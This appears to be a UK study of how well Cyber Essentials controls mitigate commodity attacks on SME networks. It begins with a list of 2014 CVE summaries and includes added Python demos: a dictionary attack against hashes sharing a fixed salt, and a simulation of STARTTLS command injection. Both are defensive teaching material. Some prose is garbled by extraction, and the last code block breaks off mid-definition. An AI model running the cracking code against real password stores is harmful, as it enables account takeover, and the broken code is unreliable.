CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.
CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".
CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".
CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".
CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".
CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.
CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.
CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.
CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.
CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.
CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.
CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.
CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.
CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.
CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.
CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.
CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.
CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.
CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.
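The CloudForms entry above is a weakness class rather than a single bug: when every stored password shares one salt baked into the source, an attacker who obtains the hash store can build one dictionary table and reuse it against every account, and any two users with the same password are visible at a glance because their hashes match. The Python below is an added illustration, not CloudForms code and not derived from the report; the salt value, user names, passwords and wordlist are all constructed for the demo, and PBKDF2-HMAC-SHA256 is used as the stand-in password hash.

```python
import hashlib
import os
from typing import Dict, List, Tuple

FIXED_SALT = b"constructed-fixed-salt"  # stands in for a salt compiled into the code
ITERATIONS = 1000  # kept low so the demo runs quickly; production would use far more


def hash_with_salt(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


def store_fixed_salt(password: str) -> Tuple[bytes, bytes]:
    """CVE-2014-3489 pattern: every account shares one salt from the source code."""
    return FIXED_SALT, hash_with_salt(password, FIXED_SALT)


def store_random_salt(password: str) -> Tuple[bytes, bytes]:
    """Fix: a fresh random salt per account, stored alongside the hash."""
    salt = os.urandom(16)
    return salt, hash_with_salt(password, salt)


def precompute_table(wordlist: List[str], salt: bytes) -> Dict[bytes, str]:
    """Hash -> candidate for one salt. Against a fixed salt this is built once
    and reused for every account; against per-user salts it is per account."""
    return {hash_with_salt(w, salt): w for w in wordlist}


def crack(stored: Dict[str, Tuple[bytes, bytes]], wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """Recover passwords from a {user: (salt, hash)} store, caching one table per
    distinct salt. Returns the recovered passwords and the number of PBKDF2 calls spent."""
    tables: Dict[bytes, Dict[bytes, str]] = {}
    found: Dict[str, str] = {}
    work = 0
    for user, (salt, digest) in stored.items():
        if salt not in tables:
            tables[salt] = precompute_table(wordlist, salt)
            work += len(wordlist)
        if digest in tables[salt]:
            found[user] = tables[salt][digest]
    return found, work


def demo():
    """Constructed accounts and wordlist; two users chose the same weak password."""
    users = {"alice": "Winter2014", "bob": "Password1", "carol": "Winter2014"}
    wordlist = ["letmein", "Winter2014", "Password1", "qwerty"]
    fixed_store = {u: store_fixed_salt(p) for u, p in users.items()}
    random_store = {u: store_random_salt(p) for u, p in users.items()}
    return crack(fixed_store, wordlist), crack(random_store, wordlist), fixed_store


if __name__ == "__main__":
    (f_found, f_work), (r_found, r_work), fixed_store = demo()
    print("fixed salt: recovered", f_found, "with", f_work, "hash evaluations")
    print("random salt: recovered", r_found, "with", r_work, "hash evaluations")
    print("alice and carol share a hash:", fixed_store["alice"][1] == fixed_store["carol"][1])
```

With three accounts the fixed salt costs the attacker one table (four hashes) for all of them, while per-user salts force three tables (twelve); the gap grows linearly with the number of accounts, and the weak passwords are still recovered in both cases, which is why salting complements rather than replaces a password policy.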
CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.
CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.
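The nginx entry above is easy to misread as a TLS weakness; it is an input-buffering bug. A server reads a TCP segment containing "STARTTLS\r\n" followed by more bytes, upgrades the socket, and then keeps consuming the leftover cleartext bytes as if they had arrived inside the TLS session. An on-path attacker who appends a command to the client's STARTTLS line therefore gets it executed with the trust of the encrypted session. The Python model below is added here as an illustration and is not nginx code; it simulates only the line buffering around the upgrade (no real TLS, decrypted client data is simply fed in as bytes), with the attacker's and client's commands constructed for the demo. The fix it shows is the one the advisory describes: discard whatever is buffered before switching to TLS.

```python
from dataclasses import dataclass, field
from typing import List, Tuple


@dataclass
class SmtpProxy:
    """Minimal model of an SMTP front end that upgrades to TLS on STARTTLS."""
    discard_buffer_on_starttls: bool
    tls_active: bool = False
    buffer: bytes = b""
    handled: List[Tuple[str, bool]] = field(default_factory=list)  # (command, received under TLS)

    def feed(self, data: bytes) -> List[str]:
        """Consume bytes as read from the socket, process complete lines, return replies."""
        replies = []
        self.buffer += data
        while b"\r\n" in self.buffer:
            line, self.buffer = self.buffer.split(b"\r\n", 1)
            cmd = line.decode("ascii", "replace").strip()
            if cmd.upper() == "STARTTLS" and not self.tls_active:
                replies.append("220 2.0.0 Start TLS")
                self.tls_active = True
                if self.discard_buffer_on_starttls:
                    # Fix: bytes already buffered arrived in cleartext and must
                    # not be interpreted as the first commands of the TLS session.
                    self.buffer = b""
                continue
            self.handled.append((cmd, self.tls_active))
            replies.append("250 OK")
        return replies


def run_attack(discard_buffer_on_starttls: bool) -> SmtpProxy:
    """Constructed scenario: a MITM appends a command to the client's cleartext
    STARTTLS in the same segment; the real client then sends its first command
    inside TLS (modelled here as already-decrypted bytes)."""
    proxy = SmtpProxy(discard_buffer_on_starttls)
    proxy.feed(b"EHLO client.example\r\nSTARTTLS\r\nMAIL FROM:<attacker@example.net>\r\n")
    proxy.feed(b"MAIL FROM:<victim@example.org>\r\n")
    return proxy


def injected_commands(proxy: SmtpProxy) -> List[str]:
    """Commands the proxy treated as TLS-protected that actually came from the MITM."""
    return [cmd for cmd, under_tls in proxy.handled if under_tls and "attacker" in cmd]


if __name__ == "__main__":
    print("vulnerable:", injected_commands(run_attack(False)))
    print("fixed:     ", injected_commands(run_attack(True)))
```

The same discipline applies to any protocol with an in-band upgrade (IMAP, POP3, FTP AUTH TLS): the cleartext read buffer is emptied, or the handler refuses to upgrade if trailing bytes are present, before the TLS handshake begins.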
CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.
CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.
CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.
CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.
CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.
CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.
CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".
CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.
CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.
CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.
CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.
CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.
CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.
CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.
CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.
CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.
CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies, and consequently obtain sensitive information, via a crafted URL.
CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".
CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".
CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.
CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.
CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.
CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.
CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.
CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.
CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.
CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.
CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.
CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.
CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.
CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.
Survey Responses
IntroductionC
yber Essentials was introduced asa government funded scheme firstpublished in April 2014 as an interest
of national security to bolster UK securityin cyberspace The Cyber Essentialsscheme was developed in collaboration withthe Information Assurance for Small andMedium Enterprises (IASME) consortiumthe Information Security Forum (ISF) andthe British Standards Institution (BSI) as aset of basic technical security controls fororganisations to utilize for the mitigation ofthe lsquobottom 80rsquo of remote cyber-threats[3]
The scheme built to provide animplementable of the 10-steps to Cyber-Security[1] was released as part of the2011 UK Cyber Security Strategy[16] andis being backed by the UK government asan organisational standard Thus far it hasbeen adopted by several large organisationsincluding Vodafone Hewlett-Packard (HP)BAE Systems Virgin Media and Barclays[5]
The Cyber Essentials accreditation has been made mandatory from October 1st 2014 for all suppliers of government contracts involving "the handling of sensitive and personal information and provision of certain technical products and services"[17].
The Cyber Essentials security controls are summarised as follows[7]:

Firewalls and Gateways: These are devices designed to prevent unauthorised access to or from private networks, but good setup of these devices, either in hardware or software form, is important for them to be fully effective.
Secure configuration: Ensuring that systems are configured in the most secure way for the needs of the organisation.
Access control: Ensuring that only those who should have access to systems have access, and at the appropriate level.
Malware protection: Ensuring that virus and malware protection is installed and is up to date.
Patch management: Ensuring that the latest supported version of applications is used and all the necessary patches supplied by the vendor have been applied.

Figure 2: Cyber Essentials Security Tools
The intended scope of Cyber Essentials is outlined in the Cyber Essentials Scheme Assurance Framework[10]. This states that the CE controls are considered applicable to all sizes of enterprise as a base level of protection against cyber-attacks, upon which individual organisations may build with further tools, network devices or protocols for the mitigation of targeted attacks. The CE Scheme is clear in its inclusion of 'Bring your own Device' network setups in scope, as well as cloud-based services and off-the-shelf web applications. Bespoke IT systems, such as those in manufacturing and retail, are applicable to CE but hold additional vulnerabilities, due to their nature, that are not to be considered.
Aims
The purpose of this report is to investigate the effectiveness of the Cyber Essentials controls in mitigating 'commodity-level' attacks attempting to exploit vulnerabilities in Small and Medium Enterprise (SME) networks.

A commodity-level attack has been defined by CESG[8] as:

Any unauthenticated remote attack exploiting a known vulnerability with the use of tools and techniques openly available for download or purchase on the internet - and that do not require extensive specialist knowledge to conduct.¹
To effectively assess Cyber Essentials it is firstly necessary to understand the typical network configurations of SMEs. Interviews with SMEs were carried out to build abstracted network models, and a survey has been conducted to build a broader picture of SME network deployments. The survey results will help to develop our understanding of current security practice and cyber-awareness, as well as to build a general-case SME network with which to analyse the typicality of the SMEs interviewed.

The networks modelled from the collected data are to be considered with and without the use of the Cyber Essentials security controls, to comparatively establish the protection granted by the adoption of the CE scheme.

¹ This includes attacks utilising pen-testing software such as Metasploit, Kali and the Poison Ivy remote access tool, which are capable of scanning network nodes for publicly known vulnerabilities in the operating system, applications or services in use.
Methodology

The scheme of work for this report has been split into the following sections:

• Collection of data, through interviews and a survey, regarding the implementation and deployment of networks in real-world SMEs, for use in designing paper-models to be analysed.
• Composition of a list of suitable vulnerabilities that contains applicable methods by which remote attackers can conduct commodity-level attacks.
• Assessment of vulnerability mitigation for SME networks with and without the use of the CE Tools.
Data Collection
In order to analyse the effectiveness of the Cyber Essentials Security Tools, four real-world SME networks have been modelled. Models have been composed using information gathered in interviews and abstracted to reduce redundant complexity and remove any linkage with the SME. In addition, a generalisable SME model was composed from survey responses to serve as a baseline network from which all SME networks may be adapted.
Interviews
The interviews were composed with the goal of firstly understanding the layout, or topology, of the network deployed by an SME. To then build on the network configuration, it was important to understand how the network is used - where remote connections take place, how local services are utilised and how an attacker sees the network. Hardware vendors, operating systems and version numbers were considered to build a greater understanding of the network.

Additional questions were posed to examine the current state of security on the network, such as any security accreditations, previous breaches and how often updates are rolled out.
Survey
The survey was constructed as a stripped-down questionnaire representing the essence of the questions posed in the interviews. This included details of the number of workstations at the SME to gauge its size, the local and remote services available, the operating systems used on the service providers and workstations, the current security policies in place, and the respondents' awareness of the CE Scheme.

Two surveys were sent out: one to a secure list of SMEs in the NW Security Cluster[9], and another publicly to closed groups of security-interested SME representatives.
Vulnerabilities
A total of 200 random vulnerabilities have been taken, in equal numbers, from the two annual vulnerability lists CVE-2013 and CVE-2014 published by Mitre.² Any vulnerabilities found to be unsuitable for analysis have been replaced by a new candidate.

In this report we use the Mitre organisation's definition of a vulnerability, which they state as:
An information security "vulnerability" is a mistake in software that can be directly used by a hacker to gain access to a system or network. CVE considers a mistake a vulnerability if it allows an attacker to use it to violate a reasonable security policy for that system (this excludes entirely "open" security policies in which all users are trusted, or where there is no consideration of risk to the system).

² CVE is sponsored by US-CERT in the office of Cybersecurity and Communications at the US Department of Homeland Security.

Figure 3: Methodology for Assessing Cyber Essentials
(As shown on Mitre.org's Terminology page[6] in March '15)

To warrant a CVE entry in the Mitre list, individual vulnerabilities must place the affected system (or systems) into a state which either:

• allows an attacker to execute commands as another user;
• allows an attacker to access data that is contrary to the specified access restrictions for that data;
• allows an attacker to pose as another entity; or
• allows an attacker to conduct a denial of service.
High-Profile Vulnerabilities
Three specific high-profile vulnerabilities were also taken, in addition to the randomly chosen 200, and have been assessed as to what extent the Cyber Essentials scheme would affect the vulnerability of SMEs in these situations.

Additionally, the applicability of these vulnerabilities to the SME networks we studied is included, along with the respective potential to harm operations.
Mitigation Assessment
The vulnerabilities chosen have been qualitatively assessed for mitigation with and without the use of the Cyber Essentials controls. The process considers each component of the controls in asserting whether each vulnerability would be mitigated, partially mitigated or not mitigated. The results are double-vetted to ensure correctness.

For each of the SMEs interviewed, each of the vulnerabilities is assessed for applicability to that network configuration. In cases where the vulnerability is for a specific model of hardware, the network is deemed applicable if it uses a like-product from the same vendor. In cases where the vulnerability is in software, only those referencing software in use, or likely in use (based on the SME's practice), are deemed applicable to the network.
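The assessment and applicability rules above, written out as a small runnable model. This is an added example, not the report's own tooling: the four CVE texts come from the CVE Details section of this page, but their control mappings, the two placeholder CVEs, the "likely in use" software and the SME-4 router vendor are constructed for illustration.

```python
"""Added example (not the report's own tooling): a runnable model of the
report's mitigation-assessment and applicability rules.

Rules taken from the Methodology section:
  * each vulnerability is judged mitigated, partially mitigated or not
    mitigated against the five Cyber Essentials controls;
  * a hardware vulnerability applies to a network that uses a like-product
    from the same vendor; a software vulnerability applies only if that
    software is in use or likely in use.
Control mappings, placeholder CVEs and inventories below are constructed."""
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, Optional

CE_CONTROLS = frozenset({"firewalls and gateways", "secure configuration",
                         "access control", "malware protection",
                         "patch management"})
VERDICTS = ("mitigated", "partially mitigated", "not mitigated")


@dataclass(frozen=True)
class Vulnerability:
    cve: str
    vendor: str
    product: str
    kind: str                     # "hardware" or "software"
    mitigated_by: frozenset       # CE controls that address it
    fix_released: bool = True     # vendor patch / firmware available yet?
    inherent_flaw: bool = False   # no patch, firmware or config can fix it


@dataclass(frozen=True)
class Network:
    name: str
    hardware_vendors: frozenset
    software_in_use: frozenset    # in use or likely in use


def assess(v: Vulnerability) -> str:
    """Worst-case verdict: assumes the affected product is in use."""
    unknown = v.mitigated_by - CE_CONTROLS
    if unknown:
        raise ValueError(f"{v.cve}: not Cyber Essentials controls: {sorted(unknown)}")
    if v.inherent_flaw:
        return "not mitigated"            # only remedy: do not deploy it
    if v.mitigated_by - {"patch management"}:
        return "mitigated"                # blocked outright by a control
    if "patch management" in v.mitigated_by and v.fix_released:
        return "mitigated"                # vendor fix exists; CE applies it
    return "partially mitigated"          # waits on a vendor fix, or blacklisting only


def applicable(v: Vulnerability, n: Network) -> bool:
    """Applicability rule from the Mitigation Assessment section."""
    if v.kind == "hardware":
        return v.vendor in n.hardware_vendors
    return v.product in n.software_in_use


def summarise(vulns: Iterable[Vulnerability],
              network: Optional[Network] = None) -> Dict[str, int]:
    """Verdict counts; restricted to one network's applicable CVEs if given."""
    counts = Counter(assess(v) for v in vulns
                     if network is None or applicable(v, network))
    return {verdict: counts.get(verdict, 0) for verdict in VERDICTS}


PM = frozenset({"patch management"})
SAMPLE_VULNS = (
    # The four CVEs listed on this page; their vendor fixes were released.
    Vulnerability("CVE-2014-9159", "Adobe", "Adobe Reader", "software", PM),
    Vulnerability("CVE-2014-9163", "Adobe", "Adobe Flash Player", "software", PM),
    Vulnerability("CVE-2014-9350", "TP-Link", "TL-WR740N", "hardware", PM),
    Vulnerability("CVE-2014-9357", "Docker", "Docker", "software", PM),
    # Constructed placeholders for the other two verdict classes.
    Vulnerability("CVE-XXXX-UNFIXED", "ExampleVendor", "ExampleCRM",
                  "software", PM, fix_released=False),
    Vulnerability("CVE-XXXX-INHERENT", "ExampleVendor", "ExampleRouter",
                  "hardware", frozenset(), inherent_flaw=True),
)

# Inventories from the case studies; "likely in use" software and the SME-4
# router vendor are not named in the report, so those entries are constructed.
NETWORKS = {
    "SME-1": Network("SME-1", frozenset({"3Com", "Draytek", "BT"}),
                     frozenset({"Windows 7", "Windows 8.1", "Adobe Reader", "ExampleCRM"})),
    "SME-2": Network("SME-2", frozenset({"Dell", "TP-Link"}),
                     frozenset({"OS X", "Windows XP", "Windows 7", "Windows 8"})),
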